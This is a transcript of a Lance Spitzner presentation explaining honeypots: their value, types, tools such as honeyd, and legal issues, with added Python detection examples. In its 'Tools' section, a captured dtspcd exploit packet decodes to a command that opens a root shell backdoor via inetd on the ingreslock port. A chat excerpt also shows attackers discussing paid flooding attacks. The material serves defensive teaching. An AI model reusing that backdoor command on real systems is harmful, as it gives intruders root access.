Honeypots.

Presentation transcript:

Honeypots

Your Speaker
Lance Spitzner
Senior Security Architect, Sun Microsystems
Founder of the Honeynet Project
Author of Honeypots: Tracking Hackers
Co-author of Know Your Enemy
Moderator of the <honeypots@securityfocus.com> maillist
Former ‘tread head’.

Purpose To introduce you to honeypots, what they are, how they work, their value.

Problem There is a variety of misconceptions about honeypots; everyone has their own definition. This confusion has caused a lack of understanding and a lack of adoption.

Honeypot Timeline
1990/1991 - The Cuckoo’s Egg and Evening with Berferd
1997 - Deception Toolkit
1998 - CyberCop Sting
1998 - NetFacade (and Snort)
1998 - BackOfficer Friendly
1999 - Formation of the Honeynet Project
2001 - Worms captured
2002 - dtspcd exploit capture

Definition Any security resource whose value lies in being probed, attacked, or compromised.

How honeypots work Simple concept A resource that expects no data, so any traffic to or from it is most likely unauthorized activity

Not limited to a specific purpose Honeypots do not solve a specific problem; instead they are a tool that contributes to your overall security architecture. Their value, and the problems they help solve, depend on how you build, deploy, and use them.

Types Production (Law Enforcement) Research (Counter-Intelligence) Marty’s idea

Value What is the value of honeypots? One of the greatest areas of confusion concerning honeypot technologies.

Advantages Based on how honeypots conceptually work, they have several advantages:
Reduce False Positives and False Negatives
Data Value
Resources
Simplicity

Disadvantages Based on the concept of honeypots, they also have disadvantages:
Narrow Field of View
Fingerprinting
Risk

Production: Prevention, Detection, Response

Prevention Keeping the burglar out of your house. Honeypots, in general, are not effective prevention mechanisms. Deception, deterrence, and decoys are psychological weapons. They do NOT work against automated attacks: worms, auto-rooters, mass-rooters.

Detection Detecting the burglar when he breaks in. Honeypots excel at this capability, due to their advantages.
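The detection principle behind the “How honeypots work” and “Detection” slides, as an added example that is not part of the original presentation: any flow record touching a honeypot address becomes an alert, and traffic that the honeypot itself originates is ranked highest, since that is the “Risk” the deck describes. The honeypot addresses and the flow-log format are constructed for the example.

```python
import ipaddress
from dataclasses import dataclass

# Addresses set aside as honeypots (constructed for this example). No service is
# advertised on them, so nothing legitimate should ever send to or from them.
HONEYPOTS = {ipaddress.ip_address(a) for a in ("192.168.1.200", "192.168.1.201")}

# Constructed flow log, one record per line: "<time> <src>:<sport> -> <dst>:<dport>"
SAMPLE_FLOWS = [
    "08:46:04 10.10.10.1:3592 -> 192.168.1.10:80",       # real web server: ignored
    "08:46:05 10.10.10.1:3593 -> 192.168.1.200:6112",    # probe of a honeypot
    "08:46:09 192.168.1.200:40001 -> 10.10.10.1:6667",   # honeypot talking out: compromised
    "08:46:10 10.10.10.7:1234 -> 192.168.1.201:22",      # probe of a second honeypot
]

@dataclass
class Alert:
    time: str
    severity: str    # "high" for probes, "critical" when the honeypot originates traffic
    src: str
    dst: str
    dport: int

def parse_flow(line):
    time, src, arrow, dst = line.split()
    assert arrow == "->"
    src_ip, _ = src.rsplit(":", 1)
    dst_ip, dport = dst.rsplit(":", 1)
    return time, ipaddress.ip_address(src_ip), ipaddress.ip_address(dst_ip), int(dport)

def classify(lines):
    """Honeypot detection logic: every flow touching a honeypot is an alert, because
    the resource expects no traffic at all. Inbound means someone is probing it;
    outbound means the honeypot itself is being used against other systems."""
    alerts = []
    for line in lines:
        time, src, dst, dport = parse_flow(line)
        if src in HONEYPOTS:
            alerts.append(Alert(time, "critical", str(src), str(dst), dport))
        elif dst in HONEYPOTS:
            alerts.append(Alert(time, "high", str(src), str(dst), dport))
    return alerts
```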

Response Honeypots can be used to help respond to an incident. They can easily be pulled offline (unlike production systems). Little to no data pollution.

Research Honeypots
Early Warning and Prediction
Discover new Tools and Tactics
Understand Motives, Behavior, and Organization
Develop Analysis and Forensic Skills

Early Warning and Prediction

Tools
01/08-08:46:04.378306 10.10.10.1:3592 -> 10.10.10.2:6112
TCP TTL:48 TOS:0x0 ID:41388 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0xFEE2C115  Ack: 0x5F66192F  Win: 0x3EBC  TcpLen: 32
TCP Options (3) => NOP NOP TS: 463986683 4158792
30 30 30 30 30 30 30 32 30 34 31 30 33 65 30 30  0000000204103e00
30 31 20 20 34 20 00 00 00 31 30 00 80 1C 40 11  01  4 ...10...@.
80 1C 40 11 10 80 01 01 80 1C 40 11 80 1C 40 11  ..@.......@...@.
80 1C 40 11 80 1C 40 11 80 1C 40 11 80 1C 40 11  ..@...@...@...@.
D0 23 FF E0 E2 23 FF E4 E4 23 FF E8 C0 23 FF EC  .#...#...#...#..
82 10 20 0B 91 D0 20 08 2F 62 69 6E 2F 6B 73 68  .. ... ./bin/ksh
20 20 20 20 2D 63 20 20 65 63 68 6F 20 22 69 6E      -c  echo "in
67 72 65 73 6C 6F 63 6B 20 73 74 72 65 61 6D 20  greslock stream 
74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20  tcp nowait root 
2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 22 3E 2F  /bin/sh sh -i">/
74 6D 70 2F 78 3B 2F 75 73 72 2F 73 62 69 6E 2F  tmp/x;/usr/sbin/
69 6E 65 74 64 20 2D 73 20 2F 74 6D 70 2F 78 3B  inetd -s /tmp/x;
73 6C 65 65 70 20 31 30 3B 2F 62 69 6E 2F 72 6D  sleep 10;/bin/rm
20 2D 66 20 2F 74 6D 70 2F 78 20 41 41 41 41 41   -f /tmp/x AAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

Tactics

Motives and Behavior
J4ck: why don't you start charging for packet attacks?
J4ck: "give me x amount and I'll take bla bla offline for this amount of time"
J1LL: it was illegal last I checked.
J4ck: heh, then everything you do is illegal. Why not make money off of it?
J4ck: I know plenty of people that'd pay exorbitant amounts for packeting.

Level of Interaction Level of Interaction determines amount of functionality a honeypot provides. The greater the interaction, the more you can learn. The greater the interaction, the more complexity and risk.

Risk Chance that an attacker can use your honeypot to harm, attack, or infiltrate other systems or organizations.

Low Interaction Provide emulated services. No operating system for the attacker to access. Information is limited to transactional information and the attacker’s activities with the emulated services.

High Interaction Provide Actual Operating Systems Learn extensive amounts of information. Extensive risk.

Honeypots (ordered from low interaction to high interaction)
BackOfficer Friendly http://www.nfr.com/products/bof/
SPECTER http://www.specter.com
Honeyd http://www.citi.umich.edu/u/provos/honeyd/
ManTrap http://www.recourse.com
Honeynets http://project.honeynet.org/papers/honeynet/

BackOfficer Friendly

Specter

Honeyd
# Template applied to every address that is not explicitly bound
create default
set default personality "FreeBSD 2.2.1-STABLE"
set default default action open
add default tcp port 80 "sh /usr/local/honeyd/scripts/web.sh"
add default tcp port 22 "sh /usr/local/honeyd/scripts/test.sh"
add default tcp port 113 reset
add default tcp port 1 reset
# Template for an emulated Windows host
create windows
set windows personality "Windows NT 4.0 Server SP5-SP6"
set windows default action reset
add windows tcp port 80 "sh /usr/local/honeyd/scripts/web.sh"
add windows tcp port 25 block
add windows tcp port 23 proxy real-server.tracking-hackers.com:23
add windows tcp port 22 proxy $ipsrc:22
set windows uptime 3284460
bind 192.168.1.200 windows
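An added example, not part of the slide deck and not honeyd’s own code: a small parser for the honeyd configuration shown above that answers what honeyd would do with a connection to a given address and port. The configuration is embedded so the example runs offline; its uptime line is applied to the windows template it configures.

```python
import shlex

# The honeyd configuration from the slide, embedded so this example runs offline.
HONEYD_CONF = """
create default
set default personality "FreeBSD 2.2.1-STABLE"
set default default action open
add default tcp port 80 "sh /usr/local/honeyd/scripts/web.sh"
add default tcp port 22 "sh /usr/local/honeyd/scripts/test.sh"
add default tcp port 113 reset
add default tcp port 1 reset
create windows
set windows personality "Windows NT 4.0 Server SP5-SP6"
set windows default action reset
add windows tcp port 80 "sh /usr/local/honeyd/scripts/web.sh"
add windows tcp port 25 block
add windows tcp port 23 proxy real-server.tracking-hackers.com:23
add windows tcp port 22 proxy $ipsrc:22
set windows uptime 3284460
bind 192.168.1.200 windows
"""

def parse_honeyd(text):
    """Parse the honeyd.conf subset used on the slide: create / set / add / bind."""
    templates, bindings = {}, {}
    for raw in text.splitlines():
        tok = shlex.split(raw.split("#", 1)[0])   # drop comments, honour quotes
        if not tok:
            continue
        cmd, name = tok[0], tok[1]
        if cmd == "create":
            templates[name] = {"personality": None, "default": None, "uptime": None, "ports": {}}
        elif cmd == "set" and tok[2] == "personality":
            templates[name]["personality"] = tok[3]
        elif cmd == "set" and tok[2] == "uptime":
            templates[name]["uptime"] = int(tok[3])
        elif cmd == "set" and tok[2] == "default":
            templates[name]["default"] = tok[-1]     # set T default [tcp] action <act>
        elif cmd == "add":                            # add T tcp port N <action ...>
            templates[name]["ports"][(tok[2], int(tok[4]))] = " ".join(tok[5:])
        elif cmd == "bind":                           # bind <ip> <template>
            bindings[name] = tok[2]
    return templates, bindings

def resolve(templates, bindings, ip, port, proto="tcp"):
    """Template name and action honeyd applies to a connection to ip:port;
    an address with no bind falls back to the 'default' template."""
    tname = bindings.get(ip, "default")
    tmpl = templates[tname]
    return tname, tmpl["ports"].get((proto, port), tmpl["default"])
```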

ManTrap

Honeynets

Which is best? None, they all have their advantages and disadvantages. It depends on what you are attempting to achieve.

Legal Issues: Privacy, Entrapment, Liability

Legal Contact for .mil / .gov
Department of Justice, Computer Crime and Intellectual Property Section
General Number: (202) 514-1026
Specific Contact: Richard Salgado
Direct Telephone: (202) 353-7848
E-Mail: richard.salgado@usdoj.gov
Any military or federal government organization can get legal advice for Honeynets from the Department of Justice. Richard Salgado of the DoJ has been researching Honeynet technologies and is the point of contact for any legal issues. For non-government and non-military organizations, you are highly encouraged to refer to your local legal counsel for legal issues involving Honeynet technologies.

Summary Honeypots are a highly flexible security tool that can be used in a variety of different deployments.

Resources Honeypots: Tracking Hackers http://www.tracking-hackers.com